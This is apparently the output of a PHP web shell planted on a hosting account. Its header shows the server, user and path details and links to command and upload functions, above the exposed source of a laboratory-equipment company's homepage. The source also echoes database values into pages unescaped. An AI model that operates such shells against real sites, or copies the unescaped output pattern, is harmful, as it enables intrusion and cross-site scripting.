Server IP : 2a02:4780:11:1361:0:bf7:7935:10 / Your IP : 18.218.38.205 Web Server : LiteSpeed System : Linux in-mum-web1261.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u200767797 ( 200767797) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u200767797/domains/drusonpharma.com/public_html/test/css/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="description" content="" /> <meta name="author" content="" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>ASCENSOR</title> <link rel="shortcut icon" href="images/favicon.png"/> <link href="css/owl.carousel.css" rel="stylesheet" type="text/css" /> <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <link href="https://fonts.googleapis.com/css2?family=Livvic:ital,wght@0,300;0,400;0,500;0,600;0,700;0,900;1,300;1,400;1,500;1,600;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet"> <link href="css/animate.css" rel="stylesheet" type="text/css" /> <link href="css/line-awesome.min.css" rel="stylesheet" type="text/css" /> <link href="css/owl.carousel.css" rel="stylesheet" type="text/css" /> <link href="css/lightslider.min.css" rel="stylesheet" type="text/css" /> <link href="css/base.css" rel="stylesheet" type="text/css" /> <link href="css/shortcodes.css" rel="stylesheet" type="text/css" /> <link href="css/style.css" rel="stylesheet" type="text/css" /> </head> <body> <div class="page-wrapper"> <div id="ht-preloader"> <div class="clear-loader d-flex align-items-center justify-content-center"> <div class="loader"> <img src="images/logo2.png"> </div> </div> </div> <?php include 'header.php';?> <!--header end--> <!--hero section start--> <section class="banner p-0 pos-r fullscreen-banner"> <div class="banner-slider owl-carousel no-pb" data-dots="false" data-nav="true"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `banners` order by id desc"); $i=0; while($row=mysqli_fetch_array($cate)){ $i++; $id=$row['id']; $image=$row['banner']; $image = $base.'/admin/dist/include/images/'.$image; ?> <div class="item hero-overlay" data-bg-img="<?php echo $image ?>" data-overlay="6"> <div class="align-center pt-0"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-10 col-12"> <h1 class="mb-4 text-black">Research & Verify <span class="text-theme">Laboratory</span> for Testing</h1> <p class="lead font-w-5 text-black">we are a dynamic scientific company dedicated to pushing the boundaries of what is possible.</p> <div class="btn-box mt-5"> <a class="btn btn-theme" href="about-us.php"> <span>More About</span> </a> <a class="btn btn-dark" href="#"> <span>View detail</span> </a> </div> </div> </div> </div> </div> </div> <?php } ?> </div> </section> <!--hero section end--> <!--body content start--> <div class="page-content"> <!--feature start--> <section class="pb-0"> <div class="container"> <div class="row"> <div class="col-lg-3 col-sm-6"> <div class="featured-item style-1"> <div class="featured-icon"> <i class="flaticon-laboratory-1"></i> </div> <div class="featured-title"> <h5>High-End Latest Technology</h5> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-5 mt-sm-0"> <div class="featured-item style-1 active"> <div class="featured-icon"> <i class="flaticon-laboratory"></i> </div> <div class="featured-title"> <h5>Medical laboratory Technician</h5> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-5 mt-lg-0"> <div class="featured-item style-1"> <div class="featured-icon"> <i class="flaticon-biology-1"></i> </div> <div class="featured-title"> <h5>Highest Quality Pathologycam Testing</h5> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-5 mt-lg-0"> <div class="featured-item style-1"> <div class="featured-icon"> <i class="flaticon-help-call"></i> </div> <div class="featured-title"> <h5>Emergency Help Available 24/7</h5> </div> </div> </div> </div> </div> </section> <!--feature end--> <!--about start--> <section> <div class="container"> <div class="row align-items-center justify-content-between"> <div class="col-lg-5 col-12 order-lg-1"> <img class="img-fluid" src="images/about.jpg" alt=""> </div> <div class="col-lg-7 col-12 mt-6 mt-lg-0"> <div class="section-title"> <h2 class="title">About Us</h2> <p class="text-black font-w-5 mb-3">Welcome to ASCENSOR, where innovation meets precision in the world of scientific laboratory equipment. Established with a commitment to advancing scientific research and experimentation, we take pride in being a leading provider of high-quality labware solutions tailored to meet the diverse needs of the scientific community. </p> <p> At ASCENSOR, we understand the pivotal role that accurate and reliable lab equipment plays in the pursuit of groundbreaking discoveries and advancements. With a focus on excellence, our team of experts combines cutting-edge technology with meticulous craftsmanship to deliver a comprehensive range of labware products that empower researchers, scientists, and professionals across various fields. </p> </div> <a class="btn btn-theme" href="about-us.html"> <span>More About</span> </a> </div> </div> </div> </section> <!--about end--> <!--service start--> <section class="position-relative light-bg"> <div class="container z-index-1"> <div class="row justify-content-center text-center"> <div class="col-lg-7 col-12"> <div class="section-title mb-3"> <h2 class="title mb-0" style="color:#000;">Explore Our Main Category</h2> </div> </div> </div> <div class="row"> <div class="col"> <div class="owl-carousel" data-items="3" data-md-items="2" data-sm-items="1" data-xs-items="1" data-margin="30"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `categories` order by id desc"); $a=0; while($row=mysqli_fetch_array($cate)){ $a++; $id=$row['id']; $ques=$row['category']; $image=$row['image']; $path = $base.'admin/dist/include/category/'.$image; ?> <div class="item"> <div class="service-item style-1"> <div class="service-img mx-4 z-index-1 overflow-hidden"> <img class="img-fluid" src="<?php echo $path ?>" alt=""> <div class="service-icon"> <i class="flaticon-biology-1"></i> </div> </div> <div class="service-desc mt-n5 pt-7"> <div class="service-title"> <h4><?php echo $ques ?></h4> </div> <a class="link-btn" href="sub-cat.php?cat=<?php echo $ques ?>"><i class="las la-long-arrow-alt-right"></i></a> </div> </div> </div> <?php } ?> </div> </div> </div> </div> <div class="shape-1 overflow-hidden bottom"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1440 320"> <path fill="#ffffff" fill-opacity="1" d="M0,96L21.8,112C43.6,128,87,160,131,154.7C174.5,149,218,107,262,90.7C305.5,75,349,85,393,122.7C436.4,160,480,224,524,234.7C567.3,245,611,203,655,165.3C698.2,128,742,96,785,85.3C829.1,75,873,85,916,117.3C960,149,1004,203,1047,229.3C1090.9,256,1135,256,1178,234.7C1221.8,213,1265,171,1309,154.7C1352.7,139,1396,149,1418,154.7L1440,160L1440,320L1418.2,320C1396.4,320,1353,320,1309,320C1265.5,320,1222,320,1178,320C1134.5,320,1091,320,1047,320C1003.6,320,960,320,916,320C872.7,320,829,320,785,320C741.8,320,698,320,655,320C610.9,320,567,320,524,320C480,320,436,320,393,320C349.1,320,305,320,262,320C218.2,320,175,320,131,320C87.3,320,44,320,22,320L0,320Z"></path> </svg> </div> </section> <!--service end--> <!--counter start--> <section class="p-0"> <div class="container"> <div class="row"> <div class="col"> <div class="white-bg p-5 z-index-1"> <div class="row"> <div class="col-lg-3 col-sm-6"> <div class="counter d-flex"> <div class="counter-icon me-3"> <i class="flaticon-medical-laboratory-1"></i> </div> <div class="counter-desc"> <span class="count-number" data-to="10" data-speed="2000">10</span> <i class="lab la-plus"></i> <h6>Category</h6> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-5 mt-sm-0"> <div class="counter d-flex"> <div class="counter-icon me-3"> <i class="flaticon-heathcare-and-medical"></i> </div> <div class="counter-desc"> <span class="count-number" data-to="1000" data-speed="2000">1000+</span> <h6>Products</h6> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-5 mt-lg-0"> <div class="counter d-flex"> <div class="counter-icon me-3"> <i class="flaticon-pharmacy"></i> </div> <div class="counter-desc"> <span class="count-number" data-to="500" data-speed="2000">500+</span> <h6>Clients</h6> </div> </div> </div> <div class="col-lg-3 col-sm-6 mt-5 mt-lg-0"> <div class="counter d-flex"> <div class="counter-icon me-3"> <i class="flaticon-award"></i> </div> <div class="counter-desc"> <span class="count-number" data-to="20" data-speed="2000">20+</span> <h6>Years Experience</h6> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!--counter end--> <!--multi-sec start--> <section class="p-0 mt-n6"> <div class="container-fluid ps-0"> <div class="row"> <div class="col-lg-7 col-md-10 col-11"> <div class="dark-bg p-lg-7 p-4 pb-10 custom-pt-1" data-bg-img="images/pattern.png"> <div class="section-title ms-md-5"> <h2 class="title">We’re Setting the New Standards in Laboratory & Research Professional.</h2> <p class="lead text-light">Explore Our Main Category</p> </div> </div> </div> </div> </div> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-8 pe-md-0"> <div class="light-bg p-5 z-index-1 mt-n7"> <div class="ht-progress-bar mb-4"> <h4>Environmental Testing</h4> <div class="progress" data-value="85"> <div class="progress-bar"> <div class="progress-parcent"><span>85</span>%</div> </div> </div> </div> <div class="ht-progress-bar mb-4"> <h4>Immune system</h4> <div class="progress" data-value="75"> <div class="progress-bar"> <div class="progress-parcent"><span>75</span>%</div> </div> </div> </div> <div class="ht-progress-bar mb-4"> <h4>Advanced Microscopy</h4> <div class="progress" data-value="95"> <div class="progress-bar"> <div class="progress-parcent"><span>95</span>%</div> </div> </div> </div> <div class="ht-progress-bar"> <h4>Management</h4> <div class="progress" data-value="80"> <div class="progress-bar"> <div class="progress-parcent"><span>80</span>%</div> </div> </div> </div> </div> </div> <div class="col-lg-6 col-md-10 col-12 ms-auto ps-0"> <div class="position-relative overflow-hidden img-border mt-n15 custom-mt-0"> <img class="img-fluid w-100" src="images/progress.jpg" alt=""> </div> </div> </div> </div> </section> <!--multi-sec end--> <!--client start--> <!--client end--> <!--project start--> <!--project end--> <!--call us start--> <!--call us end--> <!--team start--> <!--team end--> <section class="parallaxie" data-bg-img="images/04.jpg" style="background-image: url("images/bc.jpg.jpg"); background-size: cover; background-repeat: no-repeat; background-attachment: fixed; background-position: center 75.45px;"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-8 col-11 ms-auto"> <div class="form-background box-shadow p-4 p-md-5 z-index-1"> <div class="section-title mb-4"> <h2 class="title mb-0" style="color:#000;">Please Form Fill Below</h2> </div> <form id="queto-form" method="post" action="php/contact.php"> <div id="formmessage"></div> <div class="form-group"> <input id="form_name" type="text" name="name" class="form-control" placeholder="Name" required="required"> </div> <div class="form-group"> <input id="form_email" type="email" name="email" class="form-control" placeholder="Email" required="required"> </div> <div class="form-group"> <select name="select" class="form-select form-control"> <option>- Choose Service</option> <option>Laboratory Glassware</option> <option>Equipment</option> <option>Analytical Vials</option> <option>Process Systems</option> </select> </div> <div class="form-group"> <textarea id="form_message" name="message" class="form-control" placeholder="Message" rows="3" required="required"></textarea> </div> <div class="mt-4"> <button class="btn btn-theme" style="background-color:#2363D5;"><span>Send Messages</span> </button> </div> </form> </div> </div> </div> </div> </section> <!--blog start--> <!--blog end--> <!--body content end--> <section class="position-relative light-bg1"> <div class="container z-index-1"> <div class="row justify-content-center text-center"> <div class="col-lg-7 col-12"> <div class="section-title mb-3"> <h2 class="title mb-0">Latest Products</h2> </div> </div> </div> <div class="row"> <div class="col"> <div class="owl-carousel" data-items="3" data-md-items="2" data-sm-items="1" data-xs-items="1" data-margin="30"> <?php include('connection.php'); $cate=mysqli_query($con,"SELECT * FROM `products` order by id desc limit 8"); $a=0; while($row=mysqli_fetch_array($cate)){ $a++; $id=$row['id']; $name=$row['name']; $ques=$row['category']; $sb=$row['sub_category']; $images=$row['images']; $pdf=$row['pdf']; $descr=$row['description']; $speci=$row['specs']; $fe=$row['features']; $pi=$row['pid']; $path = $base.'admin/dist/include/pdfs/'.$pdf; $img = $base.'admin/dist/include/uploads/'.$images; ?> <div class="item"> <div class="card post-card border-0 rounded-0 shadow-sm bg-transparent"> <img class="card-img-top" src="<?php echo $img ?>" alt="Image"> <div class="card-body px-4 pb-4 pt-0"> <div class="mt-n3"> <div class="d-inline-block white-bg px-2 py-1 text-white box-shadow"><?php echo $name ?></div> </div> <h2 class="h4 my-3"><?php echo $ques ?> </h2> <p><?php echo substr($descr,0,100) ?></p> <div class="d-flex justify-content-between align-items-center"> <div> </div> <a class="link-btn" href="product-detail.php?id=<?php echo $id ?>"><i class="las la-long-arrow-alt-right"></i></a> </div> </div> </div> </div> <?php } ?> </div> </div> </div> </div> <div class="shape-1 overflow-hidden bottom"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1440 320"> <path fill="#ffffff" fill-opacity="1" d="M0,96L21.8,112C43.6,128,87,160,131,154.7C174.5,149,218,107,262,90.7C305.5,75,349,85,393,122.7C436.4,160,480,224,524,234.7C567.3,245,611,203,655,165.3C698.2,128,742,96,785,85.3C829.1,75,873,85,916,117.3C960,149,1004,203,1047,229.3C1090.9,256,1135,256,1178,234.7C1221.8,213,1265,171,1309,154.7C1352.7,139,1396,149,1418,154.7L1440,160L1440,320L1418.2,320C1396.4,320,1353,320,1309,320C1265.5,320,1222,320,1178,320C1134.5,320,1091,320,1047,320C1003.6,320,960,320,916,320C872.7,320,829,320,785,320C741.8,320,698,320,655,320C610.9,320,567,320,524,320C480,320,436,320,393,320C349.1,320,305,320,262,320C218.2,320,175,320,131,320C87.3,320,44,320,22,320L0,320Z"></path> </svg> </div> </section> <!--footer start--> <?php include 'footer.php';?> <!--footer end--> </div> <!-- page wrapper end --> <!-- Cart Modal --> <div class="scroll-top"><a class="smoothscroll" href="#top"><i class="las la-location-arrow"></i></a></div> <script src="js/theme.js"></script> <script src="js/theme-plugin.js"></script> <script src="js/theme-script.js"></script> </body> </html>